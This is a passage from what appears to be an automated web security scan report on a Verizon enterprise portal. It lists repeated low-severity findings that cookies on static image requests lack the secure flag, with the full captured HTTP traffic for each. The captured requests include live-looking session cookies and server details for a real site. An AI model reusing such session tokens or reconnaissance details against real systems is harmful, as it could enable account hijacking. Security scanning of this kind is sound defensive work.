Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 446
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "1be-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7167
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a
.d...............................................................................................................................................................................................
...[SNIP]...

6.28. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 445
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "1bd-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7187
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a
.d...............................................................................................................................................................................................
...[SNIP]...

6.29. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 336
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "150-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a
..........................................................................................................HH.HH.OO.OO............................................................................
...[SNIP]...

6.30. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a
....................................................................................................((.==.FF.HH................................................................................
...[SNIP]...

6.31. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "2b-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7193
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a.............!.......,...........D..;

6.32. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_HelpLarge.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 634
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "27a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7145
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89a.........................................................................................................................................................................vvvnnnmmmllljjjiiiYYYX
...[SNIP]...

6.33. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_errorMssg.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 546
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "222-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:17 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:17 GMT

GIF89a.....G............O.....................................
...d.4...+.............$............(.FR..|....zx....#....................................s..^..c..........................t.............
...[SNIP]...

6.34. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/icn_video.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_video.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 410
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "19a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89a.............................................................................................................................................................vvvuuurrrllleeeddd...................
...[SNIP]...

6.35. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/s.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: "2b-4e228b00"
Accept-Ranges: bytes
Cache-Control: private, max-age=7184
Date: Mon, 05 Sep 2011 22:22:43 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

GIF89a.............!.......,...........D..;

6.36. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/tooltip_button.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/tooltip_button.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
